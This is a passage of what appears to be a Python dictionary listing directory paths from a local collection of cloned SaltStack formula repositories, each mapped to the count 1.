'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/elasticache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/ec2': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/elasticache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/matthewpatterson_minions/modules/phpenv/_modules/phpenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/matthewpatterson_minions/modules/phpenv/_states/phpenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mattnorris_grain/src/gen_install_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mattnorris_grain/src/remove_color_palettes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/maxmzkr_my-salt-states/_modules/PasswordGetter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mickep76_pepa/pillar/pepa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mike-perdide_custom_salt_states/custom_tools': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/minadyn_salty-anaconda/anaconda': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mingfang_docker-salt/srv/salt/_modules/dockercmd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mingfang_docker-salt/srv/salt/_states/dockercmd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_elasticsearch-formula/elasticsearch/files/es2graphite': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/shaker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/shaker/resolve_deps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/admin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/migrations': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjulian_misc-salt-states/files/nagiosStats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/moccamaster_saltstack-cgminer/cgminer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/monash-merc_cvl-salt-states/runners/sshkeys': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/morlandi_stack_basic/saltstack/salt/django-learn-postgresql/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mortis1337_salt-dash/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mortis1337_salt-dash/routes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_grains/mac_battery': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/ard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/desktop': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/dscl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/finder': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/installer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/launchd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/login': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/plist_nsdefaults': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/plist_serialization': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/pmset': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/spctl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/ard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/bluetooth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/cups': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/gatekeeper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/plist': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/power': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/novapost_saltpad/saltpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/oba11_salt-collectd/salt/_modules/nm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/oba11_salt-nfs/salt/_modules/nm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice/provision': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/cpu-governor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/cpu-temperature': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/disk-space': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/interface-ip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-load': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-mem': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-swap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/time-clock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/time-date': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/tools/toggle_touchpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/if-else': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loop-range': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-for': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-nested': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-while': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/broker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-lvs/salt/_states/lvs_server': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-lvs/salt/_states/lvs_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/01-users-only/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/02-postgresql/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/03-postgresql-pillar/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/04-pgbouncer-mine/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_modules/brew': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_modules/sysvinit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/qw1mb0_saltstack/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rabits_salt-stack-modules/_modules/additional': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rackeric_salt-nummr/application/python_apps/wsgi_configuration_module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_node-salt-events/test/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends/default': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends/simple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/management': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/management/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/activity/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/bin/compress': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/admin/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/alerts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/access/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabcmds/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/fab_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/fab_tasks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabhistory/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/fabpkgs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/templatetags': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/fabric/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/graphs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/health/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/hosts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/logs/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/bshell': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/cleanup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/management/commands/install': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/services/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/serializers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/stats/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/static/admin/js/compress': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ranl_salt-pillar-linker/linker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rfairburn_salt-nagios-formula/nagios/server/files/cfg_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rhormaza_salt-common-states/salt/files/module_keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rhormaza_salt-common-states/salt/files/state_keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/docs/_themes/flask_theme_support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/shaker/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/shaker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rubic_shaker/util/ubuntu_cloud_images': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_graphite-formula/graphite/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_hosts-formula/_modules/informer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_salt-docs-formula/sphinxdocs/sphinxdocs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_tomcat-formula/tests/support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack-formulas_vim-formula/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/aiding': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/bottle': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test/functional': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/halite/test/functional/config_helper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_halite/test_server_start': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/digitalocean_metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/ec2_info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/gce': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/grains/has_battery': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/ansmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/awstats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/basicauth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/cdpr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/cloudflare': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/fahclient': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/flup_fcgi_client': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/image': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iscsistorage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/iscsitarget': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/linux_netconfig': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/linux_netstat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/nzbget': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/smx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/sysbench': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/syslog_ng': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/system': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/vzctl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/webalizer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/win_update': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/modules/wireunlurk/wireunlurk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/output/flatten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/pillars/lookup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/renderers/pyobjects': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/returners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/runners/event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/ansible': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/bacula': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/iis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_tenant': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/keystone_user_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/riak': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/smx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/syslog_ng': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/win_update': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-contrib/states/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-qa/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-states/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/docs/source/_ext/saltconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/docs/source/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/saltstack_salt-testing/salttesting': 1,
